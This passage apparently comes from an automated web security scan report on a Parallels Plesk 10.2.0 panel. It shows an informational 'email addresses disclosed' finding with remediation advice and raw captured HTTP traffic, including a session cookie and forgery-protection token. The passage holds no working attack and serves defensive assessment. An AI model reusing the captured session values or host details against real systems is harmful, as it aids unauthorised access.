   <option value='sk-SK'>Slovak (Slovakia)</option>
   <option value='sl-SI'>Slovenian (Slovenia)</option>
   <option value='es-AR'>Spanish (Argentina)</option>
   <option value='es-BO'>Spanish (Bolivia)</option>
   <option value='es-CL'>Spanish (Chile)</option>
   <option value='es-CO'>Spanish (Colombia)</option>
   <option value='es-CR'>Spanish (Costa Rica)</option>
   <option value='es-DO'>Spanish (Dominican Republic)</option>
   <option value='es-EC'>Spanish (Ecuador)</option>
   <option value='es-SV'>Spanish (El Salvador)</option>
   <option value='es-GT'>Spanish (Guatemala)</option>
   <option value='es-HN'>Spanish (Honduras)</option>
   <option value='es-MX'>Spanish (Mexico)</option>
   <option value='es-NI'>Spanish (Nicaragua)</option>
   <option value='es-PA'>Spanish (Panama)</option>
   <option value='es-PY'>Spanish (Paraguay)</option>
   <option value='es-PE'>Spanish (Peru)</option>
   <option value='es-PR'>Spanish (Puerto Rico)</option>
   <option value='es-ES'>Spanish (Spain)</option>
   <option value='es-US'>Spanish (United States)</option>
   <option value='es-UY'>Spanish (Uruguay)</option>
   <option value='es-VE'>Spanish (Venezuela)</option>
   <option value='sv-FI'>Swedish (Finland)</option>
   <option value='sv-SE'>Swedish (Sweden)</option>
   <option value='syr-SY'>Syriac (Syria)</option>
   <option value='tg-Cyrl-TJ'>Tajik (Cyrillic) (Tajikistan)</option>
   <option value='tzm-Latn-DZ'>Tamazight (Latin) (Algeria)</option>
   <option value='ta-IN'>Tamil (India)</option>
   <option value='tt-RU'>Tatar (Russia)</option>
   <option value='te-IN'>Telugu (India)</option>
   <option value='th-TH'>Thai (Thailand)</option>
   <option value='bo-CN'>Tibetan (People&#039;s Republic of China)</option>
   <option value='tr-TR'>Turkish (Turkey)</option>
   <option value='tk-TM'>Turkmen (Turkmenistan)</option>
   <option value='uk-UA'>Ukrainian (Ukraine)</option>
   <option value='hsb-DE'>Upper Sorbian (Germany)</option>
   <option value='ur-PK'>Urdu (Islamic Republic of Pakistan)</option>
   <option value='ug-CN'>Uyghur (People&#039;s Republic of China)</option>
   <option value='uz-Cyrl-UZ'>Uzbek (Cyrillic, Uzbekistan)</option>
   <option value='uz-Latn-UZ'>Uzbek (Latin, Uzbekistan)</option>
   <option value='vi-VN'>Vietnamese (Vietnam)</option>
   <option value='cy-GB'>Welsh (United Kingdom)</option>
   <option value='wo-SN'>Wolof (Senegal)</option>
   <option value='sah-RU'>Yakut (Russia)</option>
   <option value='ii-CN'>Yi (People&#039;s Republic of China)</option>
   <option value='yo-NG'>Yoruba (Nigeria)</option>
   <option value='xh-ZA'>isiXhosa (South Africa)</option>
   <option value='zu-ZA'>isiZulu (South Africa)</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Code Access Security</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-trust_level">CAS trust level</label></td>
           <td>



   <select name="trust_level" id="fid-trust_level" >    <option value='Full' SELECTED>Full</option>
   <option value='High'>High</option>
   <option value='Medium'>Medium</option>
   <option value='Low'>Low</option>
   <option value='Minimal'>Minimal</option>
</select>








           </td>
       </tr>

   </table>

</td></tr></table></fieldset>

<fieldset>

<legend>Session Settings</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>

   <table class="formFields" cellspacing="0" width="100%">


       <tr >
           <td class="name"><label for="fid-auth_mode">Authentication mode</label></td>
           <td>



   <select name="auth_mode" id="fid-auth_mode" >    <option value='Windows' SELECTED>Windows</option>
   <option value='Forms'>Forms</option>
   <option value='Passport'>Passport</option>
   <option value='None'>None</option>
</select>








           </td>
       </tr>

       <tr >
           <td class="name"><label for="fid-sess_timeout">Session timeout (minutes)</label></td>
           <td>





   <input type="text" name="sess_timeout" id="fid-sess_timeout" value="20"} size="15">





           </td>
       </tr>

   </table>

</td></tr></table></fieldset>


<input type="hidden" name="groupName" value="">
<input type="hidden" name="web_path" value="">

</div>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"></td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);update_oC(document.forms[0]); return false;;return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/hosting-panel=web.view/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11. Email addresses disclosed  previous  next
There are 13 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


11.1. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/edit/id/1  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/edit/id/1

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/edit/id/1 HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/list
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:24:49 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:24:49 GMT
Connection: close
Content-Length: 35725

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/smb/scripts/components/forms/emailaddress.js?1302230704"></script>
<title>format-1@nosedivesailing.com - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/edit" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Fedit%2Fid%2F1' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading no-border">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb/email-address/index">
<span>Up Level</span>
</a>
</div>
<h2><span><b>format-1@nosedivesailing.com</b></span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<form id="form-emailaddress" enctype="application/x-www-form-urlencoded" action="" method="post"><div id='form-tab-buttons' class='tabs'></div><script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.bar.Tabs({
type: 'dynamic',
applyTo: 'form-tab-buttons',
items: [{"componentType":"Jsw.bar.Button","title":"General","tabId":"tab-general","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Forwarding","tabId":"tab-redirect","containerCls":""},{"componentType":"Jsw.bar.Button","title":"E-mail Aliases","tabId":"tab-aliases","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Auto-Reply","tabId":"tab-autoResponder","containerCls":""},{"componentType":"Jsw.bar.Button","title":"Antivirus","tabId":"tab-antivirus","containerCls":""}]
});
});
</script>

<div id='tab-general' ><p>Set up a mailbox and specify a password for accessing it.</p>

<div id='general-generalSection' class='form-box' >
<div id='general-generalSection-content-area'>

<div class='form-row'>
<div class='field-name'>
<label for='general-generalSection-name'>E-mail address&nbsp;<span class="required">*</span></label> </div>
<div class='field-value'>
<span>

<input type="text" name="general[generalSection][name]" id="general-generalSection-name" value="format-1" class="input-text" />@vulnerable.host.fqdn </span>
<span class="field-errors" style="display: none;"></span>
</div>
</div>

<div class="form-row">
<div class="field-name">

<input type="hidden" name="general[generalSection][postbox]" value="0" /><input type="checkbox" name="general[generalSection][postbox]" id="general-generalSection-postbox" value="1" checked="checked" class="checkbox" /> <label for='general-generalSection-postbox'>Mailbox&nbsp;</label> </div>
<div class="field-value">
<div class="text-value">

<input type="hidden" name="general[generalSection][mboxQuotaValue]" value="-1" id="general-generalSection-mboxQuotaValue" /> <span><label>
<input type="radio" class="radio" value="unlimited"
id="general-generalSection-mboxQuotaValue-default"
name="general-generalSection-mboxQuotaValue-selector"
checked="checked" />
Set the mailbox size as defined by the service provider (100 MB) </label>
</span><br />
<span><label>
<input type="radio" class="radio" value="specific"
id="general-generalSection-mboxQuotaValue-specific"
name="general-generalSection-mboxQuotaValue-selector"
/>
Specify new size </label>
<input type="text" class="input-text" size="10"
value=""
id="general-generalSection-mboxQuotaValue-specific-input"
>
<select id="general-generalSection-mboxQuotaValue-specific-multiplier">
<option value="1024" selected="selected" >
KB </option>
<option value="1048576" >
MB </option>
</select>
</span><br />
<span style="display: none;" class="field-errors"></span>
</div>
</div>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {

   var updateElementStatusFunction = function() {
var postboxEnabled = $('general-generalSection-postbox').checked;
$('general-generalSection-mboxQuotaValue-default').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific').disabled = !postboxEnabled;
$('general-generalSection-mboxQuotaValue-specific-input').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
$('general-generalSection-mboxQuotaValue-specific-multiplier').disabled =
! postboxEnabled ||
! $('general-generalSection-mboxQuotaValue-specific').checked;
if (postboxEnabled && $('general-generalSection-mboxQuotaValue-specific').checked) {
$('general-generalSection-mboxQuotaValue-specific-input').focus();
}
updateElementValueFunction();
   };

var updateElementValueFunction = function() {
if (!$('general-generalSection-postbox').checked) {
return;
}

var value = 'error';
if ($('general-generalSection-mboxQuotaValue-default').checked) {
   value = -1;
} else {
   var input = $('general-generalSection-mboxQuotaValue-specific-input').value;
   var integerTest = /^\d+$/;
   if (integerTest.test(input)) {
var multiplier = $('general-generalSection-mboxQuotaValue-specific-multiplier').value;
value = input * multiplier;
   }
}
$('general-generalSection-mboxQuotaValue').value = value;
};

if ($('general-generalSection-postbox')) {
   updateElementStatusFunction();
$('general-generalSection-postbox').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-default').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific').observe('click', updateElementStatusFunction);
$('general-generalSection-mboxQuotaValue-specific-input').observe('change', updateElementValueFunction);
$('general-generalSection-mboxQuotaValue-specific-multiplier').observe('change', updateElementValueFunction);
}
});
//]]>
</script>


<div class='form-row'>
<div class='field-name'><label for='general-generalSection-userId'>Assigned to&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<span id='general-generalSection-userId'>format-1</span>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'general-generalSection'
});
});
//]]>
</script>
</div>
<div id='tab-redirect' style="display: none;"><p>Set up forwarding of e-mail messages to one or several e-mail addresses. If your mailbox is switched on under the General tab, then copies of e-mail messages will be kept in it.</p>

<div id='redirect-redirectSection' class='form-box' >
<div id='redirect-redirectSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="redirect[redirectSection][enabled]" value="0" /><input type="checkbox" name="redirect[redirectSection][enabled]" id="redirect-redirectSection-enabled" value="1" class="checkbox" />
<label for='redirect-redirectSection-enabled'>Switch on mail forwarding&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='redirect-redirectSection-subscribers-form-row' class='form-row' >
<div class='field-name'><label for='redirect-redirectSection-subscribers'>Forward incoming messages to the following e-mail address&nbsp;</label></div>
<div class='field-value'>

<textarea name="redirect[redirectSection][subscribers]" id="redirect-redirectSection-subscribers" class="f-middle-size" rows="10" cols="80"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Specify e-mail addresses. You can type each address on a new line, or separate addresses with white spaces, commas, and semicolons.</span>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'redirect-redirectSection'
});
});
//]]>
</script>
</div>
<div id='tab-aliases' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">E-mail aliases are alternative e-mail addresses associated with a primary e-mail address. All mail sent to e-mail aliases will be received by the primary e-mail address.</p></td>
</tr>

<div id='aliases-aliasesSection' class='form-box' >
<div id='aliases-aliasesSection-content-area'>
<div id="aliasesForm">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="aliases[aliasesSection][aliasesForm][dynamicSubFormTemplate][aliasName]" id="aliases-aliasesSection-aliasesForm-dynamicSubFormTemplate-aliasName" value="" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='aliases-aliasesSection-aliasesForm-buttonAddAlias-form-row' class='form-row' >
<div class='field-name'><label for='aliases-aliasesSection-aliasesForm-buttonAddAlias'>E-mail alias&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="aliases-aliasesSection-aliasesForm-buttonAddAlias"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.AliasesDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_onInitDynamic: function($super) {
$super();
this.domainNameFieldId = 'general-generalSection-domain';

if (!$('general-generalSection-domain')) {
// for my profile
this.domainNameFieldId = 'general-vcard-domain';
}

if ($(this.domainNameFieldId)) {
var context = this;
$(this.domainNameFieldId).observe('change', function() {context.onDomainChange();});
}
this.onDomainChange();
},

_isAddButtonDisabled: function() {
var isAddAliasButtonDisabled = false;
try {
isAddAliasButtonDisabled = Smb.Views.User.isExternalMailUsed();
} catch (e) { }
return isAddAliasButtonDisabled
},

_bindDynamicContent: function($super, content, isFirstElement) {
var domainElement = new Element('span', {'class' : 'aliasDomainName'});
content.select('.field-value input').last().insert({after: domainElement});
return $super(content, isFirstElement);
},

_initRemoveButtonWrapper: function(content) {
var wrapperId = this._removeButtonId + '-' + this._getRandomNumber();
content.select('.aliasDomainName').last().insert({
after: '<span id="' + wrapperId + '" class="' + this._removeButtonId + '"></span>'
});
return wrapperId;
},

_onUpdateDynamic: function($super) {
$super();
this.onDomainChange();
},

onDomainChange: function() {
var childs = this._componentElement.select('.aliasDomainName');
var domainName = this.getDomainName();
childs.each(function(child) {
child.update(' @' + domainName);
});
},

getDomainName: function() {
var domainName = 'vulnerable.host.fqdn';
if (!domainName) {
if (this.domainNameFieldId == 'general-vcard-domain') {
domainName = $(this.domainNameFieldId).value;
} else {
var index = $(this.domainNameFieldId).selectedIndex;
domainName = $(this.domainNameFieldId).options[index].text;
}
}
return domainName;
}
});

Jsw.onReady(function() {
new Smb.AliasesDynamicSubForm({
applyTo: 'aliasesForm',
addButtonId: 'aliases-aliasesSection-aliasesForm-buttonAddAlias',
addButtonTitle: 'Add e-mail alias',
removeButtonId: 'remove-alias-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script>
</div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be" id="form_forgery_protection_token" /></form>

